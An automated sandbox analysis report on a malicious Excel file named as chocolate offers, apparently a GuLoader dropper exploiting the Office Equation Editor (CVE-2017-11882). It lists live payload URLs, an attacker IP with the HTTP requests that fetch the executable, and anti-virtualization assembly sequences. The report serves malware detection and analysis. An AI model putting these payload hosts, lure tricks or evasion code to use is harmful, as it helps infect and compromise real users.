Windows Analysis Report MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx

Overview

General Information

Sample Name: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx
Analysis ID: 452495
MD5: b7cdda847140697b7bb7866b06d2a225
SHA1: 874d1157c6e65813383c6b4bffd4d48948993c88
SHA256: 1e7447cb7adb3336fcf6d2837781a2ab0d9f9fd3060cde3a47293bd34a883cdb
Tags: VelvetSweatshopxlsx

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Drops PE files to the user root directory
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://180.214.239.39/process/.svchost.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 42%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 180.214.239.39:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://kinmirai.org/wp-content/bin_inUIdCgQk163.bin
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Jul 2021 11:50:59 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Wed, 21 Jul 2021 22:37:17 GMTETag: "3c468-5c7a9d0090119"Accept-Ranges: bytesContent-Length: 246888Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 180.214.239.39 180.214.239.39
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F70A7842.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /process/.svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.239.39Connection: Keep-Alive
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: F70A7842.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E543B NtAllocateVirtualMemory, 6_2_002E543B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E5540 NtAllocateVirtualMemory, 6_2_002E5540
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E543B 6_2_002E543B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2C2A 6_2_002E2C2A
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E8C36 6_2_002E8C36
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E841E 6_2_002E841E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4860 6_2_002E4860
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7077 6_2_002E7077
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0C4C 6_2_002E0C4C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E8C42 6_2_002E8C42
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0C54 6_2_002E0C54
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2455 6_2_002E2455
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E80A4 6_2_002E80A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E28A0 6_2_002E28A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E048D 6_2_002E048D
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0889 6_2_002E0889
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E80EF 6_2_002E80EF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E48E9 6_2_002E48E9
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E80C6 6_2_002E80C6
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0CC3 6_2_002E0CC3
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E38D1 6_2_002E38D1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3D2C 6_2_002E3D2C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D3E 6_2_002E7D3E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E5908 6_2_002E5908
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D06 6_2_002E7D06
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4105 6_2_002E4105
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2518 6_2_002E2518
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0916 6_2_002E0916
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4912 6_2_002E4912
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E517E 6_2_002E517E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0147 6_2_002E0147
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E5D43 6_2_002E5D43
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E15BD 6_2_002E15BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E05B1 6_2_002E05B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3D84 6_2_002E3D84
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E322C 6_2_002E322C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2228 6_2_002E2228
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E1A21 6_2_002E1A21
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E163B 6_2_002E163B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E421B 6_2_002E421B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3A18 6_2_002E3A18
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3A69 6_2_002E3A69
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E1A78 6_2_002E1A78
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3259 6_2_002E3259
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3684 6_2_002E3684
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E42C0 6_2_002E42C0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3ED8 6_2_002E3ED8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E832E 6_2_002E832E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3325 6_2_002E3325
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6B35 6_2_002E6B35
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E770F 6_2_002E770F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E4712 6_2_002E4712
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6B7B 6_2_002E6B7B
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2379 6_2_002E2379
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7F4E 6_2_002E7F4E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E475F 6_2_002E475F
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6FAF 6_2_002E6FAF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E27A4 6_2_002E27A4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7BA4 6_2_002E7BA4
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E47A2 6_2_002E47A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E87BC 6_2_002E87BC
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E23FF 6_2_002E23FF
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E47C8 6_2_002E47C8
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E0BDC 6_2_002E0BDC
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@4/13@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR164D.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Static file information: File size 1267200 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\Interrup.pdb source: .svchost[1].exe.4.dr
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Initial sample: OLE indicators vbamacros = False
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002212F5 push edx; ret 6_2_00221321
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221023 push edx; ret 6_2_00221051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222823 push edx; ret 6_2_00222851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224023 push edx; ret 6_2_00224051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00227024 push edx; ret 6_2_00227051
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225825 push edx; ret 6_2_00225851
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224833 push edx; ret 6_2_00224861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223033 push edx; ret 6_2_00223061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221833 push edx; ret 6_2_00221861
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226034 push edx; ret 6_2_00226061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220038 push edx; ret 6_2_00220061
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224803 push edx; ret 6_2_00224831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223003 push edx; ret 6_2_00223031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221803 push edx; ret 6_2_00221831
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226004 push edx; ret 6_2_00226031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220008 push edx; ret 6_2_00220031
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223813 push edx; ret 6_2_00223841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225013 push edx; ret 6_2_00225041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222014 push edx; ret 6_2_00222041
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226814 push edx; ret 6_2_00226841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220818 push edx; ret 6_2_00220841
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223063 push edx; ret 6_2_00223091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00221863 push edx; ret 6_2_00221891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00224863 push edx; ret 6_2_00224891
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226065 push edx; ret 6_2_00226091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220068 push edx; ret 6_2_00220091
Source: C:\Users\Public\vbc.exe Code function: 6_2_00222074 push edx; ret 6_2_002220A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00223874 push edx; ret 6_2_002238A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00225074 push edx; ret 6_2_002250A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00226875 push edx; ret 6_2_002268A1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00220878 push edx; ret 6_2_002208A1

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsx Stream path 'EncryptedPackage' entropy: 7.99876914636 (max. 8.0)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E28A0 6_2_002E28A0
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D3E 6_2_002E7D3E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7503 6_2_002E7503
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2379 6_2_002E2379
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E27A4 6_2_002E27A4
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E8CAB second address: 00000000002E8CAB instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov dword ptr [ebp+00000253h], edx 0x00000010 mov edx, 83A23224h 0x00000015 cmp bh, ch 0x00000017 test ah, dh 0x00000019 xor edx, B23AA633h 0x0000001f xor edx, 5BA5550Bh 0x00000025 test ch, 00000068h 0x00000028 sub edx, 6A3DC11Ch 0x0000002e test cx, dx 0x00000031 cmp dword ptr [ebp+00000253h], edx 0x00000037 mov edx, dword ptr [ebp+00000253h] 0x0000003d jne 00007F28A87C6F98h 0x0000003f dec ebx 0x00000040 xor edx, edx 0x00000042 mov eax, ebx 0x00000044 test si, 634Bh 0x00000049 mov ecx, D06366DFh 0x0000004e test bx, cx 0x00000051 sub ecx, D6A7F971h 0x00000057 cmp ecx, ecx 0x00000059 xor ecx, 335F4321h 0x0000005f sub ecx, CAE42E4Bh 0x00000065 test ebx, edx 0x00000067 div ecx 0x00000069 pushad 0x0000006a rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000002E750B second address: 00000000002E752A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4E5E24E1h 0x00000007 xor eax, 256A0EB4h 0x0000000c xor eax, 6B41C15Ch 0x00000011 xor eax, 0075EB08h 0x00000016 cpuid 0x00000018 popad 0x00000019 pushad 0x0000001a mov ecx, 000000F8h 0x0000001f rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E542E rdtsc 6_2_002E542E
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 824 Thread sleep time: -300000s >= -30000s Jump to behavior

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E542E rdtsc 6_2_002E542E
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E504C mov eax, dword ptr fs:[00000030h] 6_2_002E504C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D3E mov eax, dword ptr fs:[00000030h] 6_2_002E7D3E
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7106 mov eax, dword ptr fs:[00000030h] 6_2_002E7106
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7D06 mov eax, dword ptr fs:[00000030h] 6_2_002E7D06
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E322C mov eax, dword ptr fs:[00000030h] 6_2_002E322C
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E3259 mov eax, dword ptr fs:[00000030h] 6_2_002E3259
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E2EF7 mov eax, dword ptr fs:[00000030h] 6_2_002E2EF7
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E6B69 mov eax, dword ptr fs:[00000030h] 6_2_002E6B69
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E27A4 mov eax, dword ptr fs:[00000030h] 6_2_002E27A4

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2388941517.0000000000980000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 6_2_002E7337 cpuid 6_2_002E7337
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior